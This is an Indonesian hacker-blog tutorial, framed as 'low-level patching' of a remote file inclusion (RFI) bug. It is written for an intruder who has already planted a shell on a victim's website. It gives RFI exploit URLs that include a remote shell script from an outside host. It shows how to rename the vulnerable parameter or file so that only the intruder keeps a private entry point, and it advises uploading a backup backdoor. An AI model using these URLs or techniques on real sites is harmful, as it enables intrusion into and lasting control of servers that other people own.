Cara Low Level Patching RFI


Detective-ID - Halo Kali ini ane mau ngasih tau lagi nih cara Low Level Patching RFI , Untuk Lebih Jelasnya Bisa Simak Tutor Ini ...!!

Patching = suatu kegiatan untuk menutup celah keamanan (Vulnerability) dari sebuah website sehingga tidak bisa dieksploitasi lagi

Namanya Low Level Jadi Ini Cuma Tehnik Simple/Mudah Saja
Tunggu Versi Medium Dan Advanced :D

Kali Ini Kita Melakukan Patching Setelah Kita Berhasil Mengupload Shell/Backdoor Kita
Syarat Kita Bisa Melakukan Patching :

1.Celah Bug Da Di Direktory Dengan Permision 777 (Biasanya Si :D)
2.Syarat Diatas Tidak berlaku bila Kita Sudah mendapatkan Hak Akses Root (Dimana Aja Bisa Klo Udah Root)

Caranya ..

1.Memodifikasi file yang merupakan bug RFI
http://Site Target//includes/CONTOH.php?phpbb_root_path[user]=http://bbmgwil2.go.id/publikasi/hn.txt?
Nah teman2 Pasti tau Kan Dimana Letak Bug RFI na
CONTOH ===== Bug Yang Akan Dipatch.
Jadi Cari Nama File Tersebut (CONTOH) Biasanya Si Klo Pake HN Shell Warnanya Kuning
Jadi intinya kita akan Edit File Contoh Tadi
Cari bagian include($phpbb_root_path["user"]
include($phpbb_root_path["user"] === Bug Rfi Yang memungkinkan seorang attacker bisa masuk melaluinya
Kita Rubah Menjadi include($phpbb_root_path["hacker-neabie"]
Sehingga Bila Ada Yang mencoba Menyusup melalui
http://Site Target//includes/CONTOH.php?phpbb_root_path[user]=http://bbmgwil2.go.id/publikasi/hn.txt?
Tidak Akan Berfungsi

2.Rubah Nama File Bug Tadi
Gunakan Perintah
mv CONTOH.php hacker-newbie.php
Sehingga Hasil Scan Php Injek Tadi Gak Akan Berfungsi (URL Otomatis Berubah)

3.Delete Aza ..
Daripada Capek-Capek Puyeng Ma Bug Ntu ..
Udah Delete Aja File Yang Menjadi Bug RFI tadi
rm CONTOH.php
Gak ada lagi file yang bisa diinjeksi kalau file itu sendiri sudah Hilang

Cara 1 Dan 2 Kamu Masih Bisa Masuk Dengan URL Pribadi Tadi (Jadi Hanya Kamu Yang Tau )
ex : 1.http://Site Target//includes/CONTOH.php?phpbb_root_path[hacker-newbie]=http://bbmgwil2.go.id/publikasi/hn.txt?
2.http://Site Target//includes/hacker-newbie.php?phpbb_root_path[user]=http://bbmgwil2.go.id/publikasi/hn.txt?

Tapi Klo Cara Ketiga ..??
Kan U Udah Punya Backdoor tetap :D Upload Dulu La Backdoor Cadangan :p

Segini Dulu Aja Ya Sob ..

Thx For HN And Bejamz


-----Semoga Bermanfaat-----